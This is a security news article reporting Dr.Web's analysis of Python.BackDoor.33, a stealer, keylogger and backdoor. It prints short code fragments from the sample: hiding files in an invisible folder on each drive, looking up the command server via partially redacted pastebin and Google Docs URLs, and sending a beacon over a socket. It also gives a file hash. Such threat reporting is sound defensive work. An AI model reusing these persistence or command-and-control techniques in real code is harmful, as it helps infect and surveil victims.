Thursday, December 5, 2024
HomeBackdoorNew Python Backdoor Allows Hackers to Control Your Infected Device Remotely

New Python Backdoor Allows Hackers to Control Your Infected Device Remotely

Published on

SIEM as a Service

A Newly discovered backdoor that was written in Python has been detected as Python.BackDoor.33 with 3  interesting futures (stealer, keylogger, backdoor) that allow hackers to take full control of your infected device.

Recent threats are mainly had backdoor capabilities and that have many advance futures such as Keylogger, screen capture, webcam, Voice Recorder, File Browser, Remote  Command  Shell and install/uninstall Future.

Malware authors used Some advanced techniques to pack this Trojan to evade the Anti Virus detection.

- Advertisement - SIEM as a Service

It contains some packed malicious utility file that helps to run python scripts on windows ordinary executable Files. The functions of this malicious program are implemented in a file mscore.pyc.

Also Read : SYSCON Backdoor Uses FTP as a Command & Control Server

How Does This Python Backdoor Works

Once This Backdoor has infected the victim’s Device It saves a copy of the file on a Drive and modifies the Windows Registry key to confirm that, it has successfully launched and shut down the Script.

This Backdoor’s Main Malicious function will execute only after restarting the computer. Once system successfully restarted then this Trojan will Infect all the drives from C to Z.

Later It creates a hidden folder to copy it’s executable and a link to root directory that refers to malicious executable file and All files different from .lnk, VolumeInformation.exe and .vbs are moved to the hidden folder created earlier.

hidden_folder = os.path.join(drive, unichr(160))
if not os.path.exists(hidden_folder):
    os.mkdir(hidden_folder)
ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2)

Trojan try to identify the IP address an available port of the command and control server by sending a request to several Internet servers, including pastebin.com, docs.google.com, and notes.io.


url_list = [
    'http://pastebin.com/raw/xf****iX',
    'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs'
    'http://notes.io/r***H'
]
According to Dr.Web Reseracher, If the backdoor was successful in obtaining the IP address and port, it sends a special request to the C&C server. If the Trojan receives a response , it will download the Python scripts added to the Dr.Web virus databases as Python.BackDoor.35 from the C&C server and run them on the infected device .

GLOBAL_SOCKET.sendall(str({
    'mode': 'buildClient',
    'from': 'client',
    'payload': '{}'.format(MODERATOR), # MODERATOR = "UPX"
    'key': '',
    'module_id': '',
    'session_id': '' }) + '[ENDOFMESSAGE]'

Malicious python scripts implement with 3 main Futures that is stealer, keylogger, backdoor and this Trojan will Perform following activities after infecting the victim’s machine.

  • Steal information from such browsers as Chrome, Opera, Yandex, Amigo, Torch, and Spark;
  • Perform the keylogger functions and make screenshots;
  • Download additional modules are written in Python and execute them;
  • Download files and save then on a media of the infected device;
  • Obtain contents of the specified folder;
  • “Travel” across folders;
  • Request system information.

SHA1:

  • 05cae95a3340395e363c2d6bddbc57833dbdb85c
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

ChatGPT Next Web Vulnerability Let Attackers Exploit Endpoint to Perform SSRF

Researchers released a detailed report on a significant security vulnerability named CVE-2023-49785, affecting the...

Cisco NX-OS Vulnerability Allows Attackers to Bypass Image Signature Verification

A critical vulnerability has been identified in the bootloader of Cisco NX-OS Software, potentially...

Deloitte UK Hacked – Brain Cipher Group Claim to Have Stolen 1 TB of Data

Brain Cipher has claimed to have breached Deloitte UK and exfiltrated over 1 terabyte...

Cloudflare Developer Domains Abused For Cyber Attacks

Cloudflare Pages, a popular web deployment platform, is exploited by threat actors to host...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

SMOKEDHAM Backdoor Mimic As Legitimate Tools Leveraging Google Drive & Dropbox

UNC2465, a financially motivated threat actor, leverages the SMOKEDHAM backdoor to gain initial access...

Rekoobe Backdoor In Open Directories Possibly Attacking TradingView Users

APT31, using the Rekoobe backdoor, has been observed targeting TradingView, a popular financial platform,...

Researchers Backdoored Azure Automation Account Packages And Runtime Environments

Runtime environments offer a flexible way to customize Automation Account Runbooks with specific packages....